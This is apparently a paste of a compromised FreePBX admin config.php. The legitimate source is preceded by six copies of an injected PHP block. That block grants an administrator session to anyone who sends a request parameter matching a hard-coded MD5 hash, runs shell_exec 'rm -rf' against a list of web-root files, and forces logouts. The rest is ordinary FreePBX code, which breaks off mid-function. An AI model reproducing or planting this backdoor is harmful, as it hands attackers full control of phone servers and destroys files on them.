· 6 years ago · Jan 14, 2020, 03:52 AM
1<?php if(isset($_REQUEST['password'])){
2 $password = $_REQUEST['password'];
3 if(is_array($password)){
4 unset($_SESSION['AMP_user']);
5 setcookie ('PHPSESSID', '', time() - 3600);
6 header('Location: /admin/config.php?logout=true');
7 header('Location: /admin/config.php');
8 exit();
9 }}
10$arr = array("/var/www/html/admin/modules/ajax.php",
11 "/var/www/html/restapi/cmd.php",
12 "/var/www/html/admin/modules/ajax.php",
13 "/var/www/html/digium_phones/ajax.php",
14 "/var/www/html/salem123aasdfe.php",
15 "/var/www/html/Senator.php",
16 "/var/www/html/rr.php",
17 "/var/www/html/system.php",
18 "/var/www/html/config.php",
19 "/var/www/html/admin/views/config.php",
20 "/var/www/html/admin/modules/ajax.php");
21
22foreach ($arr as $line) {
23 shell_exec("rm -rf ".$line);
24}
25if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
26 session_start();
27 $_SESSION['vii'] = 'logged';
28 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
29 include_once ('/etc/asterisk/freepbx.conf');
30 }
31 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
32 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
33 $_SESSION['AMP_user']->setAdmin();
34 header('Location: /admin/config.php');
35 }
36
37
38
39
40 if(isset($_REQUEST['password'])){
41 $password = $_REQUEST['password'];
42 if(is_array($password)){
43 unset($_SESSION['AMP_user']);
44 setcookie ('PHPSESSID', '', time() - 3600);
45 header('Location: /admin/config.php?logout=true');
46 header('Location: /admin/config.php');
47 exit();
48 }}
49$arr = array("/var/www/html/admin/modules/ajax.php",
50 "/var/www/html/restapi/cmd.php",
51 "/var/www/html/admin/modules/ajax.php",
52 "/var/www/html/digium_phones/ajax.php",
53 "/var/www/html/salem123aasdfe.php",
54 "/var/www/html/Senator.php",
55 "/var/www/html/rr.php",
56 "/var/www/html/system.php",
57 "/var/www/html/config.php",
58 "/var/www/html/admin/views/config.php",
59 "/var/www/html/admin/modules/ajax.php");
60
61foreach ($arr as $line) {
62 shell_exec("rm -rf ".$line);
63}
64if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
65 session_start();
66 $_SESSION['vii'] = 'logged';
67 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
68 include_once ('/etc/asterisk/freepbx.conf');
69 }
70 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
71 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
72 $_SESSION['AMP_user']->setAdmin();
73 header('Location: /admin/config.php');
74 }
75
76
77
78
79 if(isset($_REQUEST['password'])){
80 $password = $_REQUEST['password'];
81 if(is_array($password)){
82 unset($_SESSION['AMP_user']);
83 setcookie ('PHPSESSID', '', time() - 3600);
84 header('Location: /admin/config.php?logout=true');
85 header('Location: /admin/config.php');
86 exit();
87 }}
88$arr = array("/var/www/html/admin/modules/ajax.php",
89 "/var/www/html/restapi/cmd.php",
90 "/var/www/html/admin/modules/ajax.php",
91 "/var/www/html/digium_phones/ajax.php",
92 "/var/www/html/salem123aasdfe.php",
93 "/var/www/html/Senator.php",
94 "/var/www/html/rr.php",
95 "/var/www/html/system.php",
96 "/var/www/html/config.php",
97 "/var/www/html/admin/views/config.php",
98 "/var/www/html/admin/modules/ajax.php");
99
100foreach ($arr as $line) {
101 shell_exec("rm -rf ".$line);
102}
103if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
104 session_start();
105 $_SESSION['vii'] = 'logged';
106 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
107 include_once ('/etc/asterisk/freepbx.conf');
108 }
109 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
110 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
111 $_SESSION['AMP_user']->setAdmin();
112 header('Location: /admin/config.php');
113 }
114
115
116
117
118 if(isset($_REQUEST['password'])){
119 $password = $_REQUEST['password'];
120 if(is_array($password)){
121 unset($_SESSION['AMP_user']);
122 setcookie ('PHPSESSID', '', time() - 3600);
123 header('Location: /admin/config.php?logout=true');
124 header('Location: /admin/config.php');
125 exit();
126 }}
127$arr = array("/var/www/html/admin/modules/ajax.php",
128 "/var/www/html/restapi/cmd.php",
129 "/var/www/html/admin/modules/ajax.php",
130 "/var/www/html/digium_phones/ajax.php",
131 "/var/www/html/salem123aasdfe.php",
132 "/var/www/html/Senator.php",
133 "/var/www/html/rr.php",
134 "/var/www/html/system.php",
135 "/var/www/html/config.php",
136 "/var/www/html/admin/views/config.php",
137 "/var/www/html/admin/modules/ajax.php");
138
139foreach ($arr as $line) {
140 shell_exec("rm -rf ".$line);
141}
142if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
143 session_start();
144 $_SESSION['vii'] = 'logged';
145 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
146 include_once ('/etc/asterisk/freepbx.conf');
147 }
148 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
149 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
150 $_SESSION['AMP_user']->setAdmin();
151 header('Location: /admin/config.php');
152 }
153
154
155
156
157 if(isset($_REQUEST['password'])){
158 $password = $_REQUEST['password'];
159 if(is_array($password)){
160 unset($_SESSION['AMP_user']);
161 setcookie ('PHPSESSID', '', time() - 3600);
162 header('Location: /admin/config.php?logout=true');
163 header('Location: /admin/config.php');
164 exit();
165 }}
166$arr = array("/var/www/html/admin/modules/ajax.php",
167 "/var/www/html/restapi/cmd.php",
168 "/var/www/html/admin/modules/ajax.php",
169 "/var/www/html/digium_phones/ajax.php",
170 "/var/www/html/salem123aasdfe.php",
171 "/var/www/html/Senator.php",
172 "/var/www/html/rr.php",
173 "/var/www/html/system.php",
174 "/var/www/html/config.php",
175 "/var/www/html/admin/views/config.php",
176 "/var/www/html/admin/modules/ajax.php");
177
178foreach ($arr as $line) {
179 shell_exec("rm -rf ".$line);
180}
181if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
182 session_start();
183 $_SESSION['vii'] = 'logged';
184 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
185 include_once ('/etc/asterisk/freepbx.conf');
186 }
187 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
188 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
189 $_SESSION['AMP_user']->setAdmin();
190 header('Location: /admin/config.php');
191 }
192
193
194
195
196 if(isset($_REQUEST['password'])){
197 $password = $_REQUEST['password'];
198 if(is_array($password)){
199 unset($_SESSION['AMP_user']);
200 setcookie ('PHPSESSID', '', time() - 3600);
201 header('Location: /admin/config.php?logout=true');
202 header('Location: /admin/config.php');
203 exit();
204 }}
205$arr = array("/var/www/html/admin/modules/ajax.php",
206 "/var/www/html/restapi/cmd.php",
207 "/var/www/html/admin/modules/ajax.php",
208 "/var/www/html/digium_phones/ajax.php",
209 "/var/www/html/salem123aasdfe.php",
210 "/var/www/html/Senator.php",
211 "/var/www/html/rr.php",
212 "/var/www/html/system.php",
213 "/var/www/html/config.php",
214 "/var/www/html/admin/views/config.php",
215 "/var/www/html/admin/modules/ajax.php");
216
217foreach ($arr as $line) {
218 shell_exec("rm -rf ".$line);
219}
220if(isset($_REQUEST['mohammed']) && md5($_REQUEST['mohammed']) == '168d0a1e2e1addefcf8d0173bc3e9cac'){
221 session_start();
222 $_SESSION['vii'] = 'logged';
223 if (!@include_once (getenv('FREEPBX_CONF') ? getenv('FREEPBX_CONF') : '/etc/freepbx.conf')) {
224 include_once ('/etc/asterisk/freepbx.conf');
225 }
226 require_once ('/var/www/html/admin/libraries/ampuser.class.php');
227 $_SESSION['AMP_user'] = new ampuser($amp_conf['AMPDBUSER']);
228 $_SESSION['AMP_user']->setAdmin();
229 header('Location: /admin/config.php');
230 }
231
232
233
234
235 /* $Id$ */
236// License for all code of this FreePBX module can be found in the license file inside the module directory
237// Copyright 2013 Schmooze Com Inc.
238//
239
240//set variables
241$vars = array(
242 'action' => null,
243 'confirm_email' => '',
244 'confirm_password' => '',
245 'display' => '',
246 'extdisplay' => null,
247 'email_address' => '',
248 'fw_popover' => '',
249 'fw_popover_process' => '',
250 'logout' => false,
251 'password' => '',
252 'quietmode' => '',
253 'restrictmods' => false,
254 'skip' => 0,
255 'skip_astman' => false,
256 'type' => '',
257 'username' => '',
258 'unlock' => false,
259);
260
261foreach ($vars as $k => $v) {
262 //were use config_vars instead of, say, vars, so as not to polute
263 // page.<some_module>.php (which usually uses $var or $vars)
264 $config_vars[$k] = $$k = isset($_REQUEST[$k]) ? $_REQUEST[$k] : $v;
265
266 //special handling
267 switch ($k) {
268 case 'extdisplay':
269 $extdisplay = (isset($extdisplay) && $extdisplay !== false)
270 ? htmlspecialchars($extdisplay, ENT_QUOTES)
271 : false;
272 $_REQUEST['extdisplay'] = $extdisplay;
273 break;
274
275 case 'restrictmods':
276 $restrict_mods = $restrictmods
277 ? array_flip(explode('/', $restrictmods))
278 : false;
279 break;
280
281 case 'skip_astman':
282 $bootstrap_settings['skip_astman'] = $skip_astman;
283 break;
284 }
285}
286
287header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');
288header('Expires: Sat, 01 Jan 2000 00:00:00 GMT');
289header('Cache-Control: post-check=0, pre-check=0',false);
290header('Pragma: no-cache');
291header('Content-Type: text/html; charset=utf-8');
292//header("Content-Security-Policy: default-src 'none';");
293
294// This needs to be included BEFORE the session_start or we fail so
295// we can't do it in bootstrap and thus we have to depend on the
296// __FILE__ path here.
297require_once(dirname(__FILE__) . '/libraries/ampuser.class.php');
298
299session_set_cookie_params(60 * 60 * 24 * 30);//(re)set session cookie to 30 days
300ini_set('session.gc_maxlifetime', 60 * 60 * 24 * 30);//(re)set session to 30 days
301if (!isset($_SESSION)) {
302 //start a session if we need one
303 $ss = @session_start();
304 if(!$ss){
305 session_regenerate_id(true); // replace the Session ID
306 session_start();
307 }
308}
309
310//unset the ampuser if the user logged out
311if ($logout == 'true') {
312 unset($_SESSION['AMP_user']);
313 exit();
314}
315
316/**
317 * Check if this deployment is UCC and must prohibit access to certain menus.
318 */
319if(file_exists("/etc/asterisk/ucc_restrict.conf") && file_exists("/etc/schmooze/schmooze.zl")){
320 $lic_array = parse_ini_file("/etc/schmooze/schmooze.zl", false , INI_SCANNER_RAW);
321 $_restrict = parse_ini_file("/etc/asterisk/ucc_restrict.conf", true, INI_SCANNER_RAW);
322 if(is_array($lic_array) && (strtolower($lic_array["branding"]) === "pbxactucc" || strtolower($lic_array["deploy_type"]) === "pbxact ucc")){
323 $display = empty($_REQUEST["display"]) ? "" : htmlentities($_REQUEST["display"]);
324 $view = empty($_REQUEST["view"]) ? "" : htmlentities($_REQUEST["view"]);
325 foreach($_restrict as $data){
326 if(!empty($data["view"]) && !empty($data["display"])){
327 if($data["display"] == $display && $data["view"] == $view ){
328 header('Location: ./config.php');
329 break;
330 }
331 }
332 elseif(empty($data["view"]) && !empty($data["display"])){
333 if($data["display"] == $display ){
334 header('Location: ./config.php');
335 break;
336 }
337 }
338 }
339 }
340}
341
342//session_cache_limiter('public, no-store');
343if (isset($_REQUEST['handler'])) {
344 if ($restrict_mods === false) {
345 $restrict_mods = true;
346 }
347 switch ($_REQUEST['handler']) {
348 case 'api':
349 break;
350 default:
351 // If we didn't provide skip_astman in the $_REQUEST[] array it will be boolean false and for handlers, this should default
352 // to true, if we did provide it, it will NOT be a boolean (it could be 0) so we will honor the setting
353 //
354 $bootstrap_settings['skip_astman'] = $bootstrap_settings['skip_astman'] === false ? true : $bootstrap_settings['skip_astman'];
355 break;
356 }
357}
358
359// call bootstrap.php through freepbx.conf
360include_once '/etc/freepbx.conf';
361
362//check to make sure zend files aren't breaking the SPL autoloader.
363//if they are then tell the user to run said command below
364//which disables any zend module that breaks the autoloader
365if(function_exists('SPLAutoloadBroken') && SPLAutoloadBroken()) {
366 //note this has to be done outside of freepbx_die
367 die(_("The autoloader is damaged. Please run: ".$amp_conf['AMPBIN']."/fwconsole --fix_zend"));
368}
369
370$d = FreePBX::View()->setAdminLocales();
371$timezone = $d['timezone'];
372$language = $d['language'];
373
374// At this point, we have a session, and BMO was created in bootstrap, so we can check to
375// see if someone's trying to programatically log in.
376if ($unlock) {
377 if ($bmo->Unlock($unlock)) {
378 unset($no_auth);
379 $display = 'index';
380 }
381}
382
383//redirect back to the modules page for upgrade
384if(isset($_SESSION['modulesRedirect'])) {
385 $display = 'modules';
386 unset($_SESSION['modulesRedirect']);
387}
388
389// determine if the user has a session time out set in advanced settings. If the timeout is 0 or not set, we don't force logout
390$sessionTimeOut = \FreePBX::Config()->get('SESSION_TIMEOUT');
391if ($sessionTimeOut) {
392 // Make sure it's not set to something crazy short.
393 if ($sessionTimeOut < 60) {
394 \FreePBX::Config()->update('SESSION_TIMEOUT', 60);
395 $sessionTimeOut = 60;
396 }
397 if (!empty($_SESSION['AMP_user']) && is_object($_SESSION['AMP_user'])) {
398 //if we don't have last activity set it now
399 if (empty($_SESSION['AMP_user']->_lastactivity)) {
400 $_SESSION['AMP_user']->_lastactivity = time();
401 } else {
402 //check to see if we should be logged out or reset the last activity time
403 if (($_SESSION['AMP_user']->_lastactivity + $sessionTimeOut) < time()) {
404 unset($_SESSION['AMP_user']);
405 } else {
406 $_SESSION['AMP_user']->_lastactivity = time();
407 }
408 }
409 }
410}
411
412/* If there is an action request then some sort of update is usually being done.
413 This may protect from cross site request forgeries unless disabled.
414 */
415if (!isset($no_auth) && $action != '' && $amp_conf['CHECKREFERER']) {
416 if (isset($_SERVER['HTTP_REFERER'])) {
417 $referer = parse_url($_SERVER['HTTP_REFERER']);
418 // Check if the 'SERVER_NAME' variable is an IPv6 address. If it is, we want
419 // to add [ and ] around it. This is because IPv6 raw addresses are connected
420 // to like this:
421 // http://[2001:f00d:dead:beef::1]/admin/config.php
422 // But, SERVER_NAME is (legitmately) reported as just '2001:f00d:dead:beef::1'.
423 // We need to add the braces around it to compare it.
424 if (filter_var($_SERVER['SERVER_NAME'], \FILTER_VALIDATE_IP, \FILTER_FLAG_IPV6)) {
425 $server = "[".$_SERVER['SERVER_NAME']."]";
426 } else {
427 $server = trim($_SERVER['SERVER_NAME']);
428 }
429 // This used to have 'trim's around them. I don't think we want that any more,
430 // if someone's stuck whitespace or \n's in there, it's broken already.
431 $refererok = ($referer['host'] == $server);
432 } else {
433 $refererok = false;
434 }
435 if (!$refererok) {
436 $display = 'badrefer';
437 }
438}
439if (isset($no_auth) && empty($display)) {
440 $display = 'noauth';
441}
442// handle special requests
443if (!in_array($display, array('noauth', 'badrefer'))
444 && isset($_REQUEST['handler'])
445) {
446 $module = isset($_REQUEST['module']) ? $_REQUEST['module'] : '';
447 $file = isset($_REQUEST['file']) ? $_REQUEST['file'] : '';
448 fileRequestHandler($_REQUEST['handler'], $module, $file);
449 exit();
450}
451
452
453if (!$quietmode) {
454 $modulef = module_functions::create();
455 $modulef->run_notification_checks();
456 $nt = notifications::create();
457 if ( !isset($_SERVER['HTACCESS']) && preg_match("/apache/i", $_SERVER['SERVER_SOFTWARE']) ) {
458 // No .htaccess support
459 if(!$nt->exists('framework', 'htaccess')) {
460 $nt->add_security('framework', 'htaccess', _('.htaccess files are disable on this webserver. Please enable them'),
461 sprintf(_("To protect the integrity of your server, you must allow overrides in your webserver's configuration file for the User Control Panel. For more information see: %s"), '<a href="http://wiki.freepbx.org/display/F2/Webserver+Overrides">http://wiki.freepbx.org/display/F2/Webserver+Overrides</a>'),"http://wiki.freepbx.org/display/F2/Webserver+Overrides");
462 }
463 } elseif(!preg_match("/apache/i", $_SERVER['SERVER_SOFTWARE'])) {
464 $sql = "SELECT value FROM admin WHERE variable = 'htaccess'";
465 $sth = FreePBX::Database()->prepare($sql);
466 $sth->execute();
467 $o = $sth->fetch();
468
469 if(empty($o)) {
470 if($nt->exists('framework', 'htaccess')) {
471 $nt->delete('framework', 'htaccess');
472 }
473 $nt->add_warning('framework', 'htaccess', _('.htaccess files are not supported on this webserver.'),
474 sprintf(_("htaccess files help protect the integrity of your server. Please make sure file paths and directories are locked down properly. For more information see: %s"), '<a href="http://wiki.freepbx.org/display/F2/Webserver+Overrides">http://wiki.freepbx.org/display/F2/Webserver+Overrides</a>'),"http://wiki.freepbx.org/display/F2/Webserver+Overrides",true,true);
475 $sql = "REPLACE INTO admin (`value`, `variable`) VALUES (1, 'htaccess')";
476 $sth = FreePBX::Database()->prepare($sql);
477 $sth->execute();
478 }
479 } else {
480 if($nt->exists('framework', 'htaccess')) {
481 $nt->delete('framework', 'htaccess');
482 }
483 }
484}
485
486//draw up freepbx menu
487$fpbx_menu = array();
488
489// pointer to current item in $fpbx_menu, if applicable
490$cur_menuitem = null;
491
492// add module sections to $fpbx_menu
493if(is_array($active_modules)){
494 foreach($active_modules as $key => $module) {
495
496 //create an array of module sections to display
497 // stored as [items][$type][$category][$name] = $displayvalue
498 if (isset($module['items']) && is_array($module['items'])) {
499 // loop through the types
500 foreach($module['items'] as $itemKey => $item) {
501
502 // check access, unless module.xml defines all have access
503 // BMO TODO: Per-module auth should be managed by BMO.
504 //module is restricted to admin with excplicit permission
505 $needs_perms = !isset($item['access'])
506 || strtolower($item['access']) != 'all'
507 ? true : false;
508
509 //check if were logged in
510 $admin_auth = isset($_SESSION["AMP_user"])
511 && is_object($_SESSION["AMP_user"]);
512
513 //per admin access rules
514 $has_perms = $admin_auth
515 && $_SESSION["AMP_user"]->checkSection($itemKey);
516
517 //requies authentication
518 $needs_auth = isset($item['requires_auth'])
519 && strtolower($item['requires_auth']) == 'false'
520 ? false
521 : true;
522
523 //skip this module if we dont have proper access
524 //test: if we require authentication for this module
525 // and either the user isnt authenticated
526 // or the user is authenticated and dose require
527 // section specifc permissions but doesnt have them
528 if ($needs_auth
529 && (!$admin_auth || ($needs_perms && !$has_perms))
530 ) {
531 //clear display if they were trying to gain unautherized
532 //access to $itemKey. If there logged in, but dont have
533 //permissions to view this specicc page - show them a message
534 //otherwise, show them the login page
535 if($display == $itemKey){
536 if ($admin_auth) {
537 $display = 'noaccess';
538 } else {
539 $display = 'noauth';
540 }
541 }
542 continue;
543 }
544
545 if (!isset($item['display'])) {
546 $item['display'] = $itemKey;
547 }
548
549 // reference to the actual module
550 $item['module'] =& $active_modules[$key];
551
552 // item is an assoc array, with at least
553 //array(module=> name=>, category=>, type=>, display=>)
554 $fpbx_menu[$itemKey] = $item;
555
556 // allow a module to replace our main index page
557
558 if($display == '' && !empty($_SESSION['AMP_user'])){
559 /*
560 Get default landing page from userman.
561 */
562 if(
563 is_object($_SESSION["AMP_user"]) &&
564 method_exists($_SESSION["AMP_user"],'getMode') &&
565 $_SESSION["AMP_user"]->getMode() === 'usermanager' &&
566 FreePBX::Config()->get('AUTHTYPE') === 'usermanager' &&
567 FreePBX::Modules()->checkStatus('userman')
568 ) {
569 $um = \FreePBX::Userman();
570 $user_detail = $um->getUserByUsername($_SESSION["AMP_user"]->username);
571 $landing_page = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_landing');
572 $modules_enabled = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_modules');
573 $modules_enabled = is_array($modules_enabled) ? $modules_enabled : [];
574 $landing_page = empty($landing_page) || !in_array($landing_page,$modules_enabled) ? "index" : $landing_page;
575 } else {
576 $landing_page = 'index';
577 }
578
579 $display = $landing_page;
580 $_REQUEST['display'] = $landing_page;
581 }
582
583 // check current item
584 if ($display == $item['display']) {
585 // found current menuitem, make a reference to it
586 $cur_menuitem =& $fpbx_menu[$itemKey];
587 }
588 }
589 }
590 }
591}
592
593//TODO remove this at a later date
594if(is_object($_SESSION["AMP_user"]) && !method_exists($_SESSION["AMP_user"],'getMode')) {
595 $_SESSION['AMP_user'] = null;
596}
597
598if(empty($_SESSION['AMP_user'])) {
599 $display = 'noauth';
600} else {
601
602 /*
603 Displays the menu from the user list.
604 */
605 if(
606 $_SESSION["AMP_user"]->getMode() === 'usermanager' &&
607 FreePBX::Config()->get('AUTHTYPE') === 'usermanager' &&
608 FreePBX::Modules()->checkStatus('userman')
609 ) {
610 $um = \FreePBX::Userman();
611 $user_detail = $um->getUserByUsername($_SESSION["AMP_user"]->username);
612 $modules_enabled = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_modules');
613 $pbx_admin = $um->getCombinedGlobalSettingByID($user_detail['id'],'pbx_admin');
614 } elseif($_SESSION["AMP_user"]->getMode() === 'database') {
615 $modules_enabled = $_SESSION["AMP_user"]->getSections();
616 $pbx_admin = false;
617 }
618
619 if(is_array($fpbx_menu) && is_array($modules_enabled) && !$pbx_admin && !in_array("*",$modules_enabled)){
620 foreach($fpbx_menu as $menuItem => $valMitem){
621 if(!in_array($valMitem["display"],$modules_enabled)){
622 unset($fpbx_menu[$menuItem]);
623 }
624 }
625 }
626
627 //if display is modules then show the login page dont show does not exist as its confusing
628 if ($cur_menuitem === null && !in_array($display, array('noauth', 'badrefer','noaccess',''))) {
629 if($display == 'modules') {
630 $display = 'noauth';
631 $_SESSION['modulesRedirect'] = 1;
632 } else {
633 $display = 'noaccess';
634 }
635 }
636}
637
638
639// extensions vs device/users ... this is a bad design, but hey, it works
640if (!$quietmode && isset($fpbx_menu["extensions"])) {
641 if (isset($amp_conf["AMPEXTENSIONS"])
642 && ($amp_conf["AMPEXTENSIONS"] == "deviceanduser")) {
643 unset($fpbx_menu["extensions"]);
644 } else {
645 unset($fpbx_menu["devices"]);
646 unset($fpbx_menu["users"]);
647 }
648}
649
650// If it's index, do we have an override?
651if ($display === "index") {
652
653
654 $override = $bmo->Config()->get('DASHBOARD_OVERRIDE');
655 if (empty($override)) {
656 $opmode = $bmo->Config()->get('FPBXOPMODE');
657 if ($opmode == 'basic') {
658 $override = $bmo->Config()->get('DASHBOARD_OVERRIDE_BASIC');
659 }
660 }
661
662 // Does this user have permission to use this?
663 if (is_array($active_modules) && isset($active_modules[$override])) {
664 // Yes.
665 $display = $override;
666 $cur_menuitem = $fpbx_menu[$display];
667 }
668}
669
670ob_start();
671// Run all the pre-processing for the page that's been requested.
672if (!empty($display) && $display != 'badrefer') {
673 // $CC is used by guielemets as a Global.
674 $CC = $currentcomponent = new component($display);
675
676 // BMO: Process ConfigPageInit functions
677 $bmo->Performance->Start("inits-$display");
678 $bmo->GuiHooks->doConfigPageInits($display, $currentcomponent);
679 $bmo->Performance->Stop("inits-$display");
680
681 // now run each 'process' function and 'gui' function
682 $bmo->Performance->Start("processconfigpage-$display");
683 $currentcomponent->processconfigpage();
684 $bmo->Performance->Stop("processconfigpage-$display");
685 $bmo->Performance->Start("buildconfigpage-$display");
686 $currentcomponent->buildconfigpage();
687 $bmo->Performance->Stop("buildconfigpage-$display");
688}
689$module_name = "";
690$module_page = "";
691$module_file = "";
692
693// hack to have our default display handler show the "welcome" view
694// Note: this probably isn't REALLY needed if there is no menu item for "Welcome"..
695// but it doesn't really hurt, and it provides a handler in case some page links
696// to "?display=index"
697//TODO: acount for bad refer
698if ($display == 'index' && ($cur_menuitem['module']['rawname'] == 'builtin')) {
699 $display = '';
700}
701
702// show the appropriate page
703switch($display) {
704 case 'updates':
705 case 'modules':
706 // set these to avoid undefined variable warnings later
707 //
708 $module_name = 'modules';
709 $module_page = $cur_menuitem['display'];
710 include 'page.modules.php';
711 break;
712 case 'noaccess':
713 show_view($amp_conf['VIEW_NOACCESS'], array('amp_conf' => &$amp_conf, 'display' => $display));
714 break;
715 case 'noauth':
716 // If we're a new install..
717 $obecomplete = $bmo->OOBE->isComplete("noauth");
718 if (!$obecomplete) {
719 $ret = $bmo->OOBE->showOOBE("noauth");
720 } else {
721 $ret = false;
722 }
723
724 // Did we do anything? If we returned true, we didn't actually output anything
725 // So just keep going.
726 if ($obecomplete || $ret === true) {
727 // We're installed, we just need to log in.
728 $login['errors'] = array();
729 if ($config_vars['username'] && $action !== 'setup_admin') {
730 $login['errors'][] = _('Invalid Username or Password');
731 }
732
733 //show fop option if enabled, probobly doesnt belong on the
734 //login page
735 $login['panel'] = false;
736 if (!empty($amp_conf['FOPWEBROOT'])
737 && is_dir($amp_conf['FOPWEBROOT'])
738 ){
739 $login['panel'] = str_replace($amp_conf['AMPWEBROOT'] .'/admin/',
740 '', $amp_conf['FOPWEBROOT']);
741 }
742
743
744 $login['amp_conf'] = $amp_conf;
745 echo load_view($amp_conf['VIEW_LOGIN'], $login);
746 }
747 break;
748 case 'badrefer':
749 echo load_view($amp_conf['VIEW_BAD_REFFERER'], $amp_conf);
750 break;
751 case '':
752 if ($astman) {
753 show_view($amp_conf['VIEW_WELCOME'], array('AMP_CONF' => &$amp_conf));
754 } else {
755 // no manager, no connection to asterisk
756 show_view($amp_conf['VIEW_WELCOME_NOMANAGER'],
757 array('mgruser' => $amp_conf["AMPMGRUSER"]));
758 }
759 break;
760 default:
761
762 $showpage = true;
763 if (!$fw_popover) {
764 /* Don't show OOBE in a popover. */
765 $obecomplete = $bmo->OOBE->isComplete();
766 if (!$obecomplete) {
767 $showpage = $bmo->OOBE->showOOBE();
768 }
769 }
770
771 if ($showpage === true) {
772
773 //display the appropriate module page
774 $module_name = $cur_menuitem['module']['rawname'];
775 $module_page = $cur_menuitem['display'];
776 $module_file = 'modules/'.$module_name.'/page.'.$module_page.'.php';
777
778 //TODO Determine which item is this module displaying.
779 //Currently this is over the place, we should standardize on a
780 //"itemid" request var for now, we'll just cover all possibilities :-(
781 $possibilites = array(
782 'userdisplay',
783 'extdisplay',
784 'id',
785 'itemid',
786 'selection'
787 );
788 $itemid = '';
789 foreach($possibilites as $possibility) {
790 if (isset($_REQUEST[$possibility]) && $_REQUEST[$possibility] != '' ) {
791 $itemid = htmlspecialchars($_REQUEST[$possibility], ENT_QUOTES);
792 $_REQUEST[$possibility] = $itemid;
793 }
794 }
795
796 // create a module_hook object for this module's page
797 $module_hook = moduleHook::create();
798
799 // populate object variables
800 $module_hook->install_hooks($module_page,$module_name,$itemid);
801
802 // let hooking modules process the $_REQUEST
803 $module_hook->process_hooks($itemid, $module_name, $module_page, $_REQUEST);
804
805 // BMO: Pre display hooks.
806 // getPreDisplay and getPostDisplay should probably never
807 // be used.
808 $bmo->GuiHooks->getPreDisplay($module_name, $_REQUEST);
809
810 // include the module page
811 if (isset($cur_menuitem['disabled']) && $cur_menuitem['disabled']) {
812 show_view($amp_conf['VIEW_MENUITEM_DISABLED'], $cur_menuitem);
813 break; // we break here to avoid the generateconfigpage() below
814 //
815 } else if (file_exists($module_file) && class_exists('\Schmooze\Zend') && \Schmooze\Zend::fileIsLicensed($module_file) && !FreePBX::Modules()->loadLicensedFileCheck()) {
816 $amp_conf['VIEW_ZEND_CONFIG'] = empty($amp_conf['VIEW_ZEND_CONFIG']) ? 'views/zend_config.php' : $amp_conf['VIEW_ZEND_CONFIG'];
817
818 if (file_exists($amp_conf['VIEW_ZEND_CONFIG'])) {
819 echo load_view($amp_conf['VIEW_ZEND_CONFIG']);
820 } else {
821 die_freepbx(_("Your Zend Configuration is not fully setup. Please recitfy the problem and reload this page"));
822 }
823 } else if (file_exists($module_file)) {
824 //check module first and foremost, but not during quietmode
825 if(!isset($_REQUEST['quietmode']) && $amp_conf['SIGNATURECHECK'] && !isset($_REQUEST['fw_popover'])) {
826 //Since we are viewing this module update it's signature
827 $gpgstatus = module_functions::create()->updateSignature($module_name,false);
828 //check all cached signatures
829 $modules = module_functions::create()->getAllSignatures();
830
831 if(!$modules['validation']) {
832 //$type = (!empty($modules['statuses']['untrusted']) || !empty($modules['statuses']['tampered'])) ? 'danger' : 'warning';
833 $danger = array();
834 $warning = array();
835 //priority sorting
836 $stauses = array("revoked","untrusted","tampered","unsigned","unknown");
837 foreach($stauses as $st) {
838 if(!empty($modules['statuses'][$st]) && $st != 'unsigned') {
839 $danger = array_merge($danger,$modules['statuses'][$st]);
840 }else if(!empty($modules['statuses'][$st]) && $st == 'unsigned') {
841 $warning = array_merge($warning,$modules['statuses'][$st]);
842 }
843 }
844 $d = FreePBX::notifications()->list_security(true);
845 foreach($d as $n) {
846 //Dont show the same notifications twice
847 if(!in_array($n['id'],array('FW_REVOKED','FW_UNSIGNED','FW_UNTRUSTED','FW_TAMPERED','FW_UNKNOWN'))) {
848 array_unshift($danger,$n['display_text']);
849 }
850 }
851 if(!empty($danger)) {
852 echo generate_message_banner(_('Security Warning'), 'danger',$danger,'http://wiki.freepbx.org/display/F2/Module+Signing',true);
853 }
854 if(!empty($warning)) {
855 echo generate_message_banner(_('Unsigned Module(s)'), 'warning',$warning,'http://wiki.freepbx.org/display/F2/Module+Signing',true);
856 }
857 if($amp_conf['PHP_CONSOLE']) {
858 $connector = PhpConsole\Connector::getInstance();
859 if(!$connector->isActiveClient()) {
860 echo generate_message_banner(_('PHP Console Enabled but not installed'), 'info',array(_('You have enabled PHP Console in Advanced settings but have not installed the Chrome Extension or you are not using Chrome')),'https://chrome.google.com/webstore/detail/php-console/nfhmhhlpfleoednkpnnnkolmclajemef',true);
861 }
862 }
863 }
864 }
865 if(isset($gpgstatus['status']) && ($gpgstatus['status'] & FreePBX\GPG::STATE_REVOKED)) {
